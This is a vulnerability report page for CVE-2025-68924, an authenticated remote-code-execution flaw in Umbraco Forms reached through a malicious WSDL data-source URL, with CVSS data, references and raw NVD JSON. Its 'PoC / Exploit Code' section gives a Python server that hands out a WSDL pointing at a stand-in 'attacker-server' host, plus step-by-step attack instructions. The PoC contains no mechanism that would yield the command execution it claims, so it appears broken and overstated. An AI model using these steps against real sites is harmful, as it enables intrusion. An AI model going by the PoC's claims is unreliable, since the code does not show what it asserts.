Security Vulnerability Report
CVE-2025-68924 CVSS 7.5 HIGH

Published: 2026-01-16 19:16:18
Last Modified: 2026-02-20 19:51:47

Description

In Umbraco UmbracoForms through 8.13.16, an authenticated attacker can supply a malicious WSDL (aka Webservice) URL as a data source for remote code execution.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:umbraco:umbraco_forms:*:*:*:*:*:*:*:* - VULNERABLE
Umbraco Forms 8.x, all versions up to and including 8.13.16 (the CPE match uses versionEndIncluding 8.13.16, matching the "through 8.13.16" wording of the description)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68924 PoC - Malicious WSDL for Umbraco Forms RCE
# This PoC demonstrates the vulnerability concept: it only serves a WSDL
# document; the dangerous behaviour lives in how Umbraco Forms processes it.
import http.server
import socketserver

# The original listing used the xsd:, soap: and tns: prefixes without declaring
# them, so the document was not well-formed XML. The standard namespace
# declarations are added here so that the WSDL parses.
MALICIOUS_WSDL = '''<?xml version="1.0" encoding="UTF-8"?>
<definitions name="MaliciousService"
             targetNamespace="http://evil.example.com/"
             xmlns="http://schemas.xmlsoap.org/wsdl/"
             xmlns:tns="http://evil.example.com/"
             xmlns:xsd="http://www.w3.org/2001/XMLSchema"
             xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/">
  <types>
    <xsd:schema targetNamespace="http://evil.example.com/">
      <xsd:element name="ExecuteCommand">
        <xsd:complexType>
          <xsd:sequence>
            <xsd:element name="cmd" type="xsd:string"/>
          </xsd:sequence>
        </xsd:complexType>
      </xsd:element>
    </xsd:schema>
  </types>
  <message name="CmdInput">
    <part name="body" element="tns:ExecuteCommand"/>
  </message>
  <portType name="MaliciousPort">
    <operation name="Execute">
      <input message="tns:CmdInput"/>
    </operation>
  </portType>
  <binding name="MaliciousBinding" type="tns:MaliciousPort">
    <soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
    <operation>
      <soap:operation soapAction="execute"/>
      <input><soap:body use="literal"/></input>
    </operation>
  </binding>
  <service name="MaliciousService">
    <port name="MaliciousPort" binding="tns:MaliciousBinding">
      <soap:address location="http://attacker-server:8080/evil"/>
    </port>
  </service>
</definitions>'''


class WSDLSHandler(http.server.BaseHTTPRequestHandler):
    """Answers any request whose path contains 'wsdl' with the WSDL above."""

    def do_GET(self):
        if 'wsdl' in self.path:
            self.send_response(200)
            self.send_header('Content-type', 'text/xml')
            self.end_headers()
            self.wfile.write(MALICIOUS_WSDL.encode())
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, fmt, *args):
        # Silence the default per-request logging.
        pass


def start_malicious_server(port=8080):
    with socketserver.TCPServer(('', port), WSDLSHandler) as httpd:
        httpd.serve_forever()


# Attack steps:
# 1. Start the malicious WSDL server
# 2. Authenticate to Umbraco CMS
# 3. Navigate to Umbraco Forms > Data Sources
# 4. Create new data source with type 'Web Service'
# 5. Set WSDL URL to: http://attacker-server:8080/evil?wsdl
# 6. Save and trigger data source
# 7. Command execution occurs during WSDL parsing

if __name__ == '__main__':
    start_malicious_server()

References

https://github.com/advisories/GHSA-vrgw-pc9c-qrrc (VDB Entry, Vendor Advisory, Mitigation)
https://our.umbraco.com/packages/developer-tools/umbraco-forms/ (Release Notes)
https://www.nuget.org/packages/UmbracoForms (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68924", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:18.370", "lastModified": "2026-02-20T19:51:46.613", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "In Umbraco UmbracoForms through 8.13.16, an authenticated attacker can supply a malicious WSDL (aka Webservice) URL as a data source for remote code execution."}, {"lang": "es", "value": "En Umbraco UmbracoForms hasta 8.13.16, un atacante autenticado puede proporcionar una URL WSDL maliciosa (también conocida como Webservice) como fuente de datos para ejecución remota de código."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-829"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:umbraco:umbraco_forms:*:*:*:*:*:*:*:*", "versionEndIncluding": "8.13.16", "matchCriteriaId": "C726ED30-8A49-486F-B544-A73CB54C1C62"}]}]}], "references": [{"url": "https://github.com/advisories/GHSA-vrgw-pc9c-qrrc", "source": "[email protected]", "tags": ["VDB Entry", "Vendor Advisory", "Mitigation"]}, {"url": "https://our.umbraco.com/packages/developer-tools/umbraco-forms/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.nuget.org/packages/UmbracoForms", "source": "[email protected]", "tags": ["Product"]}]}}